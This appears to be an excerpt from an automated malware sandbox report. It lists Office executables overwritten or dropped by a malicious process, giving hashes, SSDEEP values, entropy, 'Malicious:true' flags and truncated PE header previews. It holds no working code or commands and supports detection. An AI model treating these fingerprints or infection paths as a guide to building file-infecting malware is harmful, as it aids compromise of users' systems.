                                      SHA-512:D0DCB842E46D1F372DBFF6CF1D3DEF6BA5461770400DE2BB7DFD9CB0DB35E80DC721C779E2CF8F852BA9B9EA9E5937D6C4DA31989D399107B6075C6771928486
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):233832
                                      Entropy (8bit):6.440520521123031
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCqW32GhNvMQ/58sl2U2Gszlz4SNBZCgMWku:Puf2GhN0lsdspzPgg1
                                      MD5:605C2C89F9F2A47F991EF737877F2FB6
                                      SHA1:14E316AFBCA1D6590C6105B7BF76A72339C3ADEF
                                      SHA-256:E96F113D251169D2B4DB5F51BFBF5F20609702F7B0BEA5FEA55CD4DF71A70682
                                      SHA-512:506E962224D44478E14FDA6A093E861E225745E36A3B32B7BC98E337F1B492A3664AD84497ECBFB427A967D3CA0390CED92D11FD9E8EF3D7887D2D9415243D5B
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):502632
                                      Entropy (8bit):6.717621615137878
                                      Encrypted:false
                                      SSDEEP:6144:PuyWDxGH79J2VX5gEpvm7JA8I6BHAlSpFG/+Ls3ze30xB7zq2zs:0MxCvm7JK6JAB/6N30xpI
                                      MD5:A18560DD287C61996F6C3498FF2B6F8F
                                      SHA1:B81EF528445CCE2BA94A933385FAF56DA526CC25
                                      SHA-256:551C24CB52C55EB77300FAE5F77A9EE565848DA83A5CEBC4587C5912C94C0A92
                                      SHA-512:2B94CA43D2F41EE88A81121889DBCFF7B014622FFA2B3048DB7CCA1C6FB7CB3D18CCCB9F4791002E166040A658FA317E42B520D44929973E034B56B7ED9C62C9
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):352704
                                      Entropy (8bit):6.382223038880705
                                      Encrypted:false
                                      SSDEEP:6144:PuoEshacHeGXduZtZ9zHVcI3uv7FgR3FTzWQ/ZZyp1:6sHHrtuZtPvh3FuQ/jyp1
                                      MD5:E517FFDADC37CBB8E4DF9D8C4595BAEB
                                      SHA1:CAC4F749D83EFAE571B6A581F0579F5EF0F5CFA1
                                      SHA-256:6B837B2B22A40521E234CE3B11A961C631927951B443DD47EF5E37E54390D907
                                      SHA-512:500B9C4AABEDAA1D430AE07651C65CABB226B482426960307F457B665686FB846C740B7F26EDE1C4607D8F294467547DAB8590E3C017EDDE4855F3C4934914F7
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4395184
                                      Entropy (8bit):5.936769631564012
                                      Encrypted:false
                                      SSDEEP:98304:eXuo5RMru45b5dZlAj0sqW7YDKMzVwgBWMTwLe7G:gR345NRAgsr7QH6h93
                                      MD5:79B2B70DAC7CA2C9EB315575E068755C
                                      SHA1:CF384F4ED6E51DC0C61853DF080F4CB38738FEA5
                                      SHA-256:76E95029FD569C640C864AF19AE98DFA5DEA2C6162B0BDA0137EB283A3DFA496
                                      SHA-512:4EEE60388342062701C05C633C1820E8A46836DFAEAEB5EEEBFC4B4104885D3A9219DFDD7012B815F66A45DF6BBE8C3EC9C1AC27E7EE56B1EFE08A6D9149DD8E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):603928
                                      Entropy (8bit):6.5283708663431606
                                      Encrypted:false
                                      SSDEEP:12288:/zKRgqBDxoiPCLXHLuk/Wg4Reh2mbeF+IGboJdx:rKgMxoiPoXruPi/++IvJdx
                                      MD5:C05D4CEB93DF5A97C92332C30BFBBEFE
                                      SHA1:756FE7D0F337C9434F289D4210C1FDD8AEFE3D5D
                                      SHA-256:C896D6442442C7A1254A64A9C1934CCD4D26A2776E8B89231F22B0E09D086A40
                                      SHA-512:06ED302B61C0DA6C490ADFB097A25F4C6F9D03085828CDEAE8A7AEB69769B3A41149A7645C9D198BEF862B18047B99606B5891064A0BD09C36178AFB3017EC7A
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):507024
                                      Entropy (8bit):6.092887734954342
                                      Encrypted:false
                                      SSDEEP:6144:Pu3yrmBq0RYSv3A5DhW15yChMFt2XTNJWLgCWzzvu:BrmBjYuALWJMn2XTmL
                                      MD5:57A0A165885523E31B9659B19D1F9C46
                                      SHA1:E1FE07D2EF284882662062186FB71F973F6CE7B1
                                      SHA-256:B3E9B85265DED45E33756F817E4E0067F82ED998673DF3A2738EFD469AE5A6E1
                                      SHA-512:7CB4AEE9D9546661DC8B847756AFB7E8B17B17D30CB85BB70ABA3A900BCAE6E5BA4344128368CAF358D0D14A395A4AA978223E7C43ECC88B3D59E28B54513347
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):251560
                                      Entropy (8bit):6.617081143188022
                                      Encrypted:false
                                      SSDEEP:6144:PuDomAAOwPcPIqk4Vsvt0uews+qZP9zOPBxGiryKI:0sAETlVsKzZPixGBKI
                                      MD5:6ED3FDB228C401F308ADA52D82C6A2AC
                                      SHA1:D5AFF2386B2708D10F68515D0D010E83CABA20E6
                                      SHA-256:D5A201D9C7373DD91395EA5B24985E9984F3ADA0CBAD869248EC975B80707184
                                      SHA-512:5431E81924400874EA1173F02B2404BB7C43E8BC158E092C43F4FA071810472E845AC76DEB7716A265A79F357BB07106D2574E3E6F5D2448761BE74F8A694493
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):793192
                                      Entropy (8bit):6.612014579396209
                                      Encrypted:false
                                      SSDEEP:12288:vdI8PdgELg6eaBlnjlZcTerWv+xdeFhvCs9TukINO:va8PWELTBlZ+erw+xdeFUsUkE
                                      MD5:B3600294526B56C0075EB5C1C1145EEA
                                      SHA1:62EDE22AE306DC3BEBBD2C4E61178DBCE0F49EA2
                                      SHA-256:B43227FD13FAF8B5AAAD38F2FEAF1507258D403831E4FBAA3EA5B477D7CF7343
                                      SHA-512:BCCBDCF0CB8722B7B4E08F702ECE1548886BA2F341875A9F169B02121C06F1EDADD973751A9466B21602E0B21CD042BCFEAE7444307B9123D4C060D9ADC23BCE
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):161968
                                      Entropy (8bit):6.521602439211849
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCmNDS5lSkjITI1FeBT77NDS5lS3j+Wzy6oUSA7hZ:PumNDS5lSyFeBTfNDS5lS7zUrsZ
                                      MD5:B3E7C226A4A331C7E684E40A5EA2F167
                                      SHA1:A2DAF5332D21746897EEC7B131374026FC0A6F4E
                                      SHA-256:8D819080F7EF8DCD45E539C64026D93F09C51C80DBC86BE86843D09A6B5FAFA5
                                      SHA-512:2D2DE9E732D6E63BFB666BA7B80F6A36BF85FC56E43F6064C62BCC557D1372F29C97510304201BC3AEBF6B6FF821F3226BFFA11457D868D5430566CE260499D5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):159560
                                      Entropy (8bit):6.570907498262082
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCGklWPsom9TiWWWWWWWQM+FtWAzhIwaeENinkf8xw3xUFv2tGPrtPmF:Pukb5zPaNQnBxw34Oita
                                      MD5:C59DC4806618B251A7D2DF183DC2F424
                                      SHA1:F1DC673B63BAA54B719167BAFDB33FF6C31BA67C
                                      SHA-256:A4817EA9A097D7F66D25BE68972A63E0C5BA7B6FF75FEA4A962C848CAFAB35B8
                                      SHA-512:71E9945E2E097640D4143198C13C5DBEC8340F8278306A34E017C3DE4A9BD0E88FB2C8DCF3A074935ACA32F329C440760980D1E8D47612F77958B108AE5581D0
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2233240
                                      Entropy (8bit):6.296579565439519
                                      Encrypted:false
                                      SSDEEP:24576:HDZgOA74U4o//sbtwvZTqFDk9sg71SmY90gh/G7QJoma+9duNGeVG29H:jqHVhTr5UmY90sGE5dIDG29H
                                      MD5:F1DE18FEED22A8E7630AEC79D099A8D4
                                      SHA1:7F500779BD5900802BE6378DDC6914D865823614
                                      SHA-256:34A7FBF7E86EED217C78BEB3D623DA57628EBFA8C5BC9EE2565BDAA51538A696
                                      SHA-512:C1EF91874D23626BAD6BB799ED2F1ED238429FA147F5EAEB955EDC51CAAD7F6325CEB6C554E3D15D598E4A54C77EF077D903FCC3DA093F0375765E68E6B40A75
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):214432
                                      Entropy (8bit):5.989123271366133
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCeVFptXofXXXXXXuh9gLzltw6Q1hqOJHrtTh:PuytXofXXXXXXASLzb9uhqK
                                      MD5:9F2A347123D639951FEE07457AAF9843
                                      SHA1:7519B79067F897D426E58DB4904F02ACEF2593A8
                                      SHA-256:C3AA5CFB1C2128BDD9A182170F993EA252CC57A69F2568B9BE61107AFD5CB512
                                      SHA-512:0402D3741F1C4A22835C59CD5A944D7762C0568E836CBDE8BC7BC389C7CF784D0A0C9F8A03B44A4241F6CE2545334222046B847A2B56AD5E4E182C959AA0A090
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):620840
                                      Entropy (8bit):6.5831228635669286
                                      Encrypted:false
                                      SSDEEP:12288:moBdI/BUQtsfBCegl2eccL1q/xRyye7BfcwqEhDe:moM/BB0Bml2m1q/xRPCcwFC
                                      MD5:6892F37A015DB48C0CA5FA54DF6D7CB2
                                      SHA1:65B2ABD3F0868D94F913387DD198336E9EAA2B57
                                      SHA-256:9E7D2DCF0E2B775911356828FCD8A6DC3217031ED3E746D31DE5855238D7289B
                                      SHA-512:6A7222CECE8289A43290E90F118CFD452F81023420491933FEDEA439D3D6AB7FF7488F41FE99F339B51A775AA27F1A717FBBAF08FCF29DDECE0CCA459139BC6E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1568248
                                      Entropy (8bit):5.675085165215227
                                      Encrypted:false
                                      SSDEEP:12288:uwF+k53zCG2tIuQ6DtJQSZDhLOhkZzV5i9w/lmd+jrcUiACW:rFXG6uQ6D9L2uV50AlmsjYUiAB
                                      MD5:F2FEC0ED0FCF36092C073FC597FD1C55
                                      SHA1:42C48161899442B2DB934156B56F971ABF1E2038
                                      SHA-256:9A3AEEE8B7D73C4F99C36B0039840B748F0AC01B9A4A3C4B5FA2B092636C0B88
                                      SHA-512:A7FBA18577A07B30F7E1417B318A5904CA355F2D126A8120E22466B4FA9D028E24E03B79D661D361B6DD38DFABA1A5096634E0E36E63A7D27C396D3625A22FA0
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):634800
                                      Entropy (8bit):6.707249248874713
                                      Encrypted:false
                                      SSDEEP:12288:ff/4sOdw+RfEB6tuAlnWhGZco6ijmn5jFTSt7yCPUkazi7JThVoSZeR6aQTJ:X/4Vdw+Ra6V6g2kazidN6SoEVF
                                      MD5:566DCF1D1A91B81E2353CAD864F7C959
                                      SHA1:A8A04AD99971D86C04C154B62AB309DD114FDC3E
                                      SHA-256:B1C16EA839550EAE959FDECA318372B0FE11613F581445BB4CFB0AEA77D0FADC
                                      SHA-512:3D233B07750A27792370E553B03A9479390A589942FAE8A0447A2CA08C27EFC719DFC4BF51051531C605F7E247430471F38C2FB2F603C4299494136EFF0C8A82
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):789664
                                      Entropy (8bit):6.688069733913981
                                      Encrypted:false
                                      SSDEEP:12288:mKxLM1deLycUTc1kZi7zb1QRHhhj7WGvF5PYcdTFtZ3G97aSDGGHrbTwqFwydBfY:myY14evTc1kZi7zb1KHL8vbTlwOB
                                      MD5:CC253EFCC1978365C16B2180685B3FD2
                                      SHA1:E221F78C79B72C24595FAA23A71AB078F4BEFF49
                                      SHA-256:C2B4875CB4E160A39B1ED5666E8100B18060D3CFAF52EF52C001B791A6E44B6D
                                      SHA-512:BF72245549DC24C163C6668AFD7F1CB8FD1D876460C864490D9288BC7EECCBA34709B9FF40720808AD00844DD8F43A3E373D1616A2CE4A680BA1A9AC2408ED81
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1917048
                                      Entropy (8bit):3.839578576312592
                                      Encrypted:false
                                      SSDEEP:6144:PuoBeXsm81c57ZXFzY5Ucyw4TapP25xxlq4cUcMeTOMzwMwZ:TKs78A5UcyOPexxPcUcMeyvZ
                                      MD5:451A02B8E292FBD664B654C28C31F8B9
                                      SHA1:7FFA3FE4C28716A3BC2D80779BDD7F23C54F5327
                                      SHA-256:0C7DECF13C25A15488EF9E271A1181BBE8A36A183250997ABB1BD21D7BF097F4
                                      SHA-512:DB59EEFBEFD8734F2B80E314B0F4DE21EBDAA23042226FDEE4671B04A7292F0ABFD6A8E20BDFF977C39EA6FDE37FA02BE69EB2342D65A335E53748314374CDE2
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4099520
                                      Entropy (8bit):3.7214924488610253
                                      Encrypted:false
                                      SSDEEP:12288:jyKs7cvZIFpCYVIUN2mGsb8HtkLaHLH04cLbUBRjLmP29DyZbT9oc/m06aCzE6hE:jyKsY+dy0ZScIBqBT11S0
                                      MD5:2D199B2128DB10FAB5D5B9E42012C0C3
                                      SHA1:B62D19530CE4FE15B51617B1E3A2B7049BFB0A6F
                                      SHA-256:A121D7A3A63D19B05BE33BA7C2391F206E47681FA284E7CA291A5431661B67FB
                                      SHA-512:022EF54CDCF41E1C8FF0511D9E5AF928394213321571B1C9BF1E6B3AA1D5FB1E29061E5C191B7669F7E2A739B9746312C091D7DDD7F8882145F09FD8B346F4B3
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):493592
                                      Entropy (8bit):6.082668463582566
                                      Encrypted:false
                                      SSDEEP:6144:Pu7vhCpFviM0OKAOVf3m+2fCz29fx8/eAeT/u:CEpFVKj3mFn9
                                      MD5:8C893EAFAF958DE19C5237DD72BB0FB2
                                      SHA1:8293D0C0FE68F441CF8E58256F456CB4B9787ADC
                                      SHA-256:8A7C766B2B4644C59F3805F0DEF8E9FB117F019FD853966D422A505AB0C3F955
                                      SHA-512:F1721F25BF8BE9ABBF0653E602EA20722D0D00C917E1F187FF22557A85EA6518E068D32C6815942FC0089D96263008E2C4C5AB7E21BE7F480D51C75735F2134F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):116664
                                      Entropy (8bit):6.585821757768255
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCtuGaz7jFQ68ICP5q0WISDr34W+wst:PutRazrA5q0WISDrZS
                                      MD5:40A8D5EE6521EA8FC13C48C47C9B57B6
                                      SHA1:5FB8A2379097B79DBB9B165F7C487D20DC1625F2
                                      SHA-256:AC909FA0CFE8E16CB2A414A4B0F0B44E0D10085ECAE1D9F53A8C202DC054154C
                                      SHA-512:333184A3A961A38C6F09B279B7BF1A31FA4FBB0405CD4D39075A52554ECB8A1C23454D02CA63698327C70C5AE1C32340561C0C6F33A88ABDEF544F65AD42F35E
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):167392
                                      Entropy (8bit):6.5469411407981974
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCcWKZbTKeR3Tzp+8IxR8jYYrjHaVLIPSL1CgNX:PucWK11Rp+8II5SLUgp
                                      MD5:67496215F23C3D121C3716927553975E
                                      SHA1:3FB19B3855F6FEDCFCEAE694DC5C28683E3653F4
                                      SHA-256:D0C2DF02E3DED17200DC56B693F52B47E7D960D05C6B6B5F7716997419303ECB
                                      SHA-512:0EB0D378F109604C568C732A197D9412A65221A4AD36889873EA3652D5D0382D40C9D5B38BD51F501E4BD55BFE2A326AE4D06F485D3129C9A2AC1C11CAFC0567
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):670928
                                      Entropy (8bit):5.994729094135172
                                      Encrypted:false
                                      SSDEEP:12288:+wbRB+ZRhFfGNpzX5PtiPWRnTLtx5eq4/RnYRoS2Ds+2EYR1XLlShtg7ksyST:+wbT+ZR3fGrzX5PtiPWRnTLtx5eq4/Ri
                                      MD5:6217032FB60672E3076D3335B7C81BD0
                                      SHA1:8DDC99A599DC77654FBF55D5B736B038EE48CAE8
                                      SHA-256:D4D500D7BF00C832D3638A7CF3D10D1C4C33A662A5608850A65611E56B6E524E
                                      SHA-512:1D8AB5ADE6FCE436BEE6EEFF9B35856C720359FDCBEEB316C5DA7B340EF64C9F6BBD67545F146116333618354B25838E12BAD3CFE21DF8F8D7546FDE0ACA2AA6
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXE

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):115920
                                      Entropy (8bit):6.214080793399046
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCiwyK75Rp1Ukkz2zct/rzdaBotnMuvWM6TUaE:zr8WDrCiwyK1Fiz2ir+o5vWM6TUaE
                                      MD5:851430DBF73C5925ED0C0AB46B4704FF
                                      SHA1:794C0FF390BE93A23BF28DDBE9DD26B81604BF5E
                                      SHA-256:F6F47F6D0027988B9DD6171C72257050C195ABDA9CE45346C01D000AD35998B1
